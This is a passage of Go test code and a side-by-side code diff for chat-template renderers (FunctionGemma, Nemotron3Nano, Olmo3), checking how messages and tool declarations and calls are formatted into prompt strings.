expected: "<bos><start_of_turn>developer\nYou are a weather expert.\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "developer_role_with_tools",
messages: []api.Message{
{Role: "developer", Content: "Be concise."},
{Role: "user", Content: "Weather?"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "get_weather",
Description: "Get weather",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}, Description: "City"},
}),
},
},
},
},
// Developer role message is preserved, tools are appended
expected: "<bos><start_of_turn>developer\nBe concise.\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "multi_turn",
messages: []api.Message{
{Role: "user", Content: "Hi"},
{Role: "assistant", Content: "Hello!"},
{Role: "user", Content: "More"},
},
expected: "<bos><start_of_turn>user\nHi<end_of_turn>\n<start_of_turn>model\nHello!<end_of_turn>\n<start_of_turn>user\nMore<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "with_tools",
messages: []api.Message{
{Role: "user", Content: "Weather?"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "get_weather",
Description: "Get weather",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}, Description: "City"},
}),
},
},
},
},
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "tool_call",
messages: []api.Message{
{Role: "user", Content: "Weather?"},
{
Role: "assistant",
ToolCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}),
},
},
},
},
{Role: "tool", Content: "Sunny"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "get_weather",
Description: "Get weather",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}, Description: "City"},
}),
},
},
},
},
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response>",
},
{
name: "assistant_content_with_tool_call",
messages: []api.Message{
{Role: "user", Content: "Weather?"},
{
Role: "assistant",
Content: "Let me check.",
ToolCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}),
},
},
},
},
{Role: "tool", Content: "Sunny"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "get_weather",
Description: "Get weather",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}, Description: "City"},
}),
},
},
},
},
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\nLet me check.<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response>",
},
{
name: "numeric_arguments",
messages: []api.Message{
{Role: "user", Content: "Add"},
{
Role: "assistant",
ToolCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "add",
Arguments: testArgs(map[string]any{"a": float64(1), "b": float64(2)}),
},
},
},
},
{Role: "tool", Content: "3"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "add",
Description: "Add numbers",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"a": {Type: api.PropertyType{"number"}},
"b": {Type: api.PropertyType{"number"}},
}),
},
},
},
},
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:add{description:<escape>Add numbers<escape>,parameters:{properties:{a:{description:<escape><escape>,type:<escape>NUMBER<escape>},b:{description:<escape><escape>,type:<escape>NUMBER<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nAdd<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:add{a:1,b:2}<end_function_call><start_function_response>response:add{<escape>3<escape>}<end_function_response>",
},
{
name: "empty_messages",
messages: []api.Message{},
expected: "<bos><start_of_turn>model\n",
},
{
name: "tool_with_required_params",
messages: []api.Message{
{Role: "user", Content: "Weather?"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "get_weather",
Description: "Gets the weather for a given city",
Parameters: api.ToolFunctionParameters{
Type: "object",
Required: []string{"city"},
Properties: testPropsMap(map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}, Description: "City Name"},
"country": {Type: api.PropertyType{"string"}, Description: "Country Name"},
}),
},
},
},
},
// Required params are escaped: required:[<escape>city<escape>]
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Gets the weather for a given city<escape>,parameters:{properties:{city:{description:<escape>City Name<escape>,type:<escape>STRING<escape>},country:{description:<escape>Country Name<escape>,type:<escape>STRING<escape>}},required:[<escape>city<escape>],type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "multiple_tools",
messages: []api.Message{
{Role: "user", Content: "Weather and time?"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "get_weather",
Description: "Get weather",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}, Description: "City"},
}),
},
},
},
{
Type: "function",
Function: api.ToolFunction{
Name: "get_time",
Description: "Get current time",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"},
}),
},
},
},
},
// Multiple tool declarations are consecutive
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><start_function_declaration>declaration:get_time{description:<escape>Get current time<escape>,parameters:{properties:{timezone:{description:<escape>Timezone<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather and time?<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "parallel_tool_calls",
messages: []api.Message{
{Role: "user", Content: "Weather and time?"},
{
Role: "assistant",
ToolCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}),
},
},
{
Function: api.ToolCallFunction{
Name: "get_time",
Arguments: testArgs(map[string]any{"timezone": "UTC"}),
},
},
},
},
{Role: "tool", Content: "Sunny"},
{Role: "tool", Content: "12:00"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "get_weather",
Description: "Get weather",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}, Description: "City"},
}),
},
},
},
{
Type: "function",
Function: api.ToolFunction{
Name: "get_time",
Description: "Get current time",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"},
}),
},
},
},
},
// Multiple tool calls and responses are consecutive
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><start_function_declaration>declaration:get_time{description:<escape>Get current time<escape>,parameters:{properties:{timezone:{description:<escape>Timezone<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather and time?<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_call>call:get_time{timezone:<escape>UTC<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response><start_function_response>response:get_time{<escape>12:00<escape>}<end_function_response>",
},
{
name: "user_after_tool_response",
messages: []api.Message{
{Role: "user", Content: "Weather?"},
{
Role: "assistant",
ToolCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}),
},
},
},
},
{Role: "tool", Content: "Sunny"},
{Role: "user", Content: "Thanks! What about London?"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "get_weather",
Description: "Get weather",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}, Description: "City"},
}),
},
},
},
},
// User message after tool response gets concatenated (user reverted to this behavior)
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response>Thanks! What about London?<end_of_turn>\n<start_of_turn>model\n",
},
// Edge cases
{
name: "tool_empty_properties",
messages: []api.Message{
{Role: "user", Content: "Test"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "test_fn",
Description: "",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{}),
},
},
},
},
// Empty properties are omitted
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:test_fn{description:<escape><escape>,parameters:{type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nTest<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "unicode_content",
messages: []api.Message{
{Role: "user", Content: "こんにちは 🎉"},
},
expected: "<bos><start_of_turn>user\nこんにちは 🎉<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "newlines_in_content",
messages: []api.Message{
{Role: "user", Content: "Line 1\nLine 2\nLine 3"},
},
expected: "<bos><start_of_turn>user\nLine 1\nLine 2\nLine 3<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "special_chars_in_content",
messages: []api.Message{
{Role: "user", Content: "Test <tag> & \"quotes\" chars"},
},
expected: "<bos><start_of_turn>user\nTest <tag> & \"quotes\" chars<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "boolean_argument",
messages: []api.Message{
{Role: "user", Content: "Set flag"},
{
Role: "assistant",
ToolCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "set_flag",
Arguments: testArgs(map[string]any{"enabled": true}),
},
},
},
},
{Role: "tool", Content: "done"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "set_flag",
Description: "Set a flag",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"enabled": {Type: api.PropertyType{"boolean"}, Description: "Flag value"},
}),
},
},
},
},
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:set_flag{description:<escape>Set a flag<escape>,parameters:{properties:{enabled:{description:<escape>Flag value<escape>,type:<escape>BOOLEAN<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nSet flag<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:set_flag{enabled:true}<end_function_call><start_function_response>response:set_flag{<escape>done<escape>}<end_function_response>",
},
{
name: "multiple_required_params",
messages: []api.Message{
{Role: "user", Content: "Test"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "test",
Description: "Test",
Parameters: api.ToolFunctionParameters{
Type: "object",
Required: []string{"a", "b", "c"},
Properties: testPropsMap(map[string]api.ToolProperty{
"a": {Type: api.PropertyType{"string"}, Description: "A"},
"b": {Type: api.PropertyType{"string"}, Description: "B"},
"c": {Type: api.PropertyType{"string"}, Description: "C"},
}),
},
},
},
},
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:test{description:<escape>Test<escape>,parameters:{properties:{a:{description:<escape>A<escape>,type:<escape>STRING<escape>},b:{description:<escape>B<escape>,type:<escape>STRING<escape>},c:{description:<escape>C<escape>,type:<escape>STRING<escape>}},required:[<escape>a<escape>,<escape>b<escape>,<escape>c<escape>],type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nTest<end_of_turn>\n<start_of_turn>model\n",
},
{
name: "array_type_param",
messages: []api.Message{
{Role: "user", Content: "Test"},
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "test",
Description: "Test",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"items": {Type: api.PropertyType{"array"}, Description: "List of items"},
}),
},
},
},
},
expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:test{description:<escape>Test<escape>,parameters:{properties:{items:{description:<escape>List of items<escape>,type:<escape>ARRAY<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nTest<end_of_turn>\n<start_of_turn>model\n",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
renderer := &FunctionGemmaRenderer{}
result, err := renderer.Render(tt.messages, tt.tools, nil)
assert.NoError(t, err)
assert.Equal(t, tt.expected, result)
})
}
}

View File

@ -114,7 +114,7 @@ func (r *Nemotron3NanoRenderer) renderTools(tools []api.Tool) string {
sb.WriteString("\n<parameters>") sb.WriteString("\n<parameters>")
if fn.Parameters.Properties != nil { if fn.Parameters.Properties != nil {
for paramName, paramFields := range fn.Parameters.Properties.All() { for paramName, paramFields := range fn.Parameters.Properties {
sb.WriteString("\n<parameter>") sb.WriteString("\n<parameter>")
sb.WriteString("\n<name>" + paramName + "</name>") sb.WriteString("\n<name>" + paramName + "</name>")
@ -202,7 +202,7 @@ func (r *Nemotron3NanoRenderer) formatContent(content string, truncate bool, add
func (r *Nemotron3NanoRenderer) writeToolCalls(sb *strings.Builder, toolCalls []api.ToolCall) { func (r *Nemotron3NanoRenderer) writeToolCalls(sb *strings.Builder, toolCalls []api.ToolCall) {
for _, tc := range toolCalls { for _, tc := range toolCalls {
sb.WriteString("<tool_call>\n<function=" + tc.Function.Name + ">\n") sb.WriteString("<tool_call>\n<function=" + tc.Function.Name + ">\n")
for name, value := range tc.Function.Arguments.All() { for name, value := range tc.Function.Arguments {
sb.WriteString("<parameter=" + name + ">\n" + r.formatArgValue(value) + "\n</parameter>\n") sb.WriteString("<parameter=" + name + ">\n" + r.formatArgValue(value) + "\n</parameter>\n")
} }
sb.WriteString("</function>\n</tool_call>\n") sb.WriteString("</function>\n</tool_call>\n")

View File

@ -75,9 +75,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"city"}, Required: []string{"city"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}, Description: "The city name"}, "city": {Type: api.PropertyType{"string"}, Description: "The city name"},
}), },
}, },
}, },
}, },
@ -113,7 +113,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}), Arguments: map[string]any{"city": "Paris"},
}, },
}, },
}, },
@ -129,9 +129,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"city"}, Required: []string{"city"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}, Description: "The city name"}, "city": {Type: api.PropertyType{"string"}, Description: "The city name"},
}), },
}, },
}, },
}, },
@ -171,7 +171,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}), Arguments: map[string]any{"city": "Paris"},
}, },
}, },
}, },
@ -185,9 +185,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
Name: "get_weather", Name: "get_weather",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}}, "city": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },
@ -238,13 +238,13 @@ func TestNemotron3NanoRenderer(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}), Arguments: map[string]any{"city": "Paris"},
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "London"}), Arguments: map[string]any{"city": "London"},
}, },
}, },
}, },
@ -259,9 +259,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
Name: "get_weather", Name: "get_weather",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}}, "city": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },
@ -304,13 +304,13 @@ func TestNemotron3NanoRenderer(t *testing.T) {
msgs: []api.Message{ msgs: []api.Message{
{Role: "user", Content: "What's the weather in Paris and London? Also, what's 2+2?"}, {Role: "user", Content: "What's the weather in Paris and London? Also, what's 2+2?"},
{Role: "assistant", Content: "", Thinking: "I need to check the weather for both cities and calculate 2+2. Let me start with the weather calls.", ToolCalls: []api.ToolCall{ {Role: "assistant", Content: "", Thinking: "I need to check the weather for both cities and calculate 2+2. Let me start with the weather calls.", ToolCalls: []api.ToolCall{
{Function: api.ToolCallFunction{Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"})}}, {Function: api.ToolCallFunction{Name: "get_weather", Arguments: api.ToolCallFunctionArguments{"city": "Paris"}}},
{Function: api.ToolCallFunction{Name: "get_weather", Arguments: testArgs(map[string]any{"city": "London"})}}, {Function: api.ToolCallFunction{Name: "get_weather", Arguments: api.ToolCallFunctionArguments{"city": "London"}}},
}}, }},
{Role: "tool", Content: "Sunny, 22°C", ToolCallID: "call1"}, {Role: "tool", Content: "Sunny, 22°C", ToolCallID: "call1"},
{Role: "tool", Content: "Rainy, 15°C", ToolCallID: "call2"}, {Role: "tool", Content: "Rainy, 15°C", ToolCallID: "call2"},
{Role: "assistant", Content: "", Thinking: "Now I have the weather data. Let me calculate 2+2.", ToolCalls: []api.ToolCall{ {Role: "assistant", Content: "", Thinking: "Now I have the weather data. Let me calculate 2+2.", ToolCalls: []api.ToolCall{
{Function: api.ToolCallFunction{Name: "calculate", Arguments: testArgs(map[string]any{"expression": "2+2"})}}, {Function: api.ToolCallFunction{Name: "calculate", Arguments: api.ToolCallFunctionArguments{"expression": "2+2"}}},
}}, }},
{Role: "tool", Content: "4", ToolCallID: "call3"}, {Role: "tool", Content: "4", ToolCallID: "call3"},
{Role: "assistant", Content: "Based on the weather data, Paris is sunny at 22°C and London is rainy at 15°C. Also, 2+2 equals 4.", Thinking: "Perfect! I have all the information needed to provide a complete answer."}, {Role: "assistant", Content: "Based on the weather data, Paris is sunny at 22°C and London is rainy at 15°C. Also, 2+2 equals 4.", Thinking: "Perfect! I have all the information needed to provide a complete answer."},
@ -322,9 +322,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
Name: "get_weather", Name: "get_weather",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}}, "city": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },
@ -334,9 +334,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
Name: "calculate", Name: "calculate",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"expression": {Type: api.PropertyType{"string"}}, "expression": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },
@ -389,7 +389,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
{ {
Role: "assistant", Role: "assistant",
ToolCalls: []api.ToolCall{ ToolCalls: []api.ToolCall{
{Function: api.ToolCallFunction{Name: "get_user", Arguments: testArgs(map[string]any{"id": "123"})}}, {Function: api.ToolCallFunction{Name: "get_user", Arguments: map[string]any{"id": "123"}}},
}, },
}, },
{Role: "tool", Content: `{"name": "John", "age": 30, "active": true}`}, {Role: "tool", Content: `{"name": "John", "age": 30, "active": true}`},
@ -401,7 +401,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
Name: "get_user", Name: "get_user",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{"id": {Type: api.PropertyType{"string"}}}), Properties: map[string]api.ToolProperty{"id": {Type: api.PropertyType{"string"}}},
}, },
}, },
}, },
@ -450,9 +450,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
ToolCalls: []api.ToolCall{ ToolCalls: []api.ToolCall{
{Function: api.ToolCallFunction{ {Function: api.ToolCallFunction{
Name: "create", Name: "create",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"data": map[string]any{"nested": "value", "count": 42}, "data": map[string]any{"nested": "value", "count": 42},
}), },
}}, }},
}, },
}, },
@ -465,7 +465,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
Name: "create", Name: "create",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{"data": {Type: api.PropertyType{"object"}}}), Properties: map[string]api.ToolProperty{"data": {Type: api.PropertyType{"object"}}},
}, },
}, },
}, },
@ -512,7 +512,7 @@ func TestNemotron3NanoRenderer(t *testing.T) {
{ {
Role: "assistant", Role: "assistant",
ToolCalls: []api.ToolCall{ ToolCalls: []api.ToolCall{
{Function: api.ToolCallFunction{Name: "translate", Arguments: testArgs(map[string]any{"text": "你好"})}}, {Function: api.ToolCallFunction{Name: "translate", Arguments: map[string]any{"text": "你好"}}},
}, },
}, },
{Role: "tool", Content: "Hello"}, {Role: "tool", Content: "Hello"},
@ -524,9 +524,9 @@ func TestNemotron3NanoRenderer(t *testing.T) {
Name: "translate", Name: "translate",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"text": {Type: api.PropertyType{"string"}}, "text": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },

View File

@ -100,8 +100,8 @@ func (r *Olmo3Renderer) Render(messages []api.Message, tools []api.Tool, _ *api.
sb.WriteString("(") sb.WriteString("(")
// Get sorted keys for deterministic output // Get sorted keys for deterministic output
keys := make([]string, 0, tc.Function.Arguments.Len()) keys := make([]string, 0, len(tc.Function.Arguments))
for k := range tc.Function.Arguments.All() { for k := range tc.Function.Arguments {
keys = append(keys, k) keys = append(keys, k)
} }
sort.Strings(keys) sort.Strings(keys)
@ -110,8 +110,7 @@ func (r *Olmo3Renderer) Render(messages []api.Message, tools []api.Tool, _ *api.
if k > 0 { if k > 0 {
sb.WriteString(", ") sb.WriteString(", ")
} }
val, _ := tc.Function.Arguments.Get(key) value, err := json.Marshal(tc.Function.Arguments[key])
value, err := json.Marshal(val)
if err != nil { if err != nil {
return "", err return "", err
} }

View File

@ -53,9 +53,9 @@ func TestOlmo3Renderer(t *testing.T) {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"location"}, Required: []string{"location"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": {Type: api.PropertyType{"string"}, Description: "The city"}, "location": {Type: api.PropertyType{"string"}, Description: "The city"},
}), },
}, },
}, },
}, },
@ -80,9 +80,9 @@ func TestOlmo3Renderer(t *testing.T) {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"location"}, Required: []string{"location"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": {Type: api.PropertyType{"string"}, Description: "The city"}, "location": {Type: api.PropertyType{"string"}, Description: "The city"},
}), },
}, },
}, },
}, },
@ -108,9 +108,9 @@ func TestOlmo3Renderer(t *testing.T) {
ID: "call_1", ID: "call_1",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: map[string]any{
"location": "San Francisco", "location": "San Francisco",
}), },
}, },
}, },
}, },
@ -126,9 +126,9 @@ func TestOlmo3Renderer(t *testing.T) {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"location"}, Required: []string{"location"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": {Type: api.PropertyType{"string"}, Description: "The city"}, "location": {Type: api.PropertyType{"string"}, Description: "The city"},
}), },
}, },
}, },
}, },
@ -172,14 +172,14 @@ func TestOlmo3Renderer(t *testing.T) {
ID: "call_1", ID: "call_1",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "San Francisco"}), Arguments: map[string]any{"location": "San Francisco"},
}, },
}, },
{ {
ID: "call_2", ID: "call_2",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{"location": "New York"}), Arguments: map[string]any{"location": "New York"},
}, },
}, },
}, },
@ -194,9 +194,9 @@ func TestOlmo3Renderer(t *testing.T) {
Name: "get_weather", Name: "get_weather",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": {Type: api.PropertyType{"string"}}, "location": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },
@ -227,10 +227,10 @@ func TestOlmo3Renderer(t *testing.T) {
ID: "call_1", ID: "call_1",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "book_flight", Name: "book_flight",
Arguments: testArgsOrdered([]orderedArg{ Arguments: map[string]any{
{"from", "SFO"}, "from": "SFO",
{"to", "NYC"}, "to": "NYC",
}), },
}, },
}, },
}, },
@ -243,10 +243,10 @@ func TestOlmo3Renderer(t *testing.T) {
Name: "book_flight", Name: "book_flight",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsOrdered([]orderedProp{ Properties: map[string]api.ToolProperty{
{"from", api.ToolProperty{Type: api.PropertyType{"string"}}}, "from": {Type: api.PropertyType{"string"}},
{"to", api.ToolProperty{Type: api.PropertyType{"string"}}}, "to": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },

View File

@ -78,7 +78,7 @@ func TestOlmo3ThinkRenderer(t *testing.T) {
ID: "call_1", ID: "call_1",
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
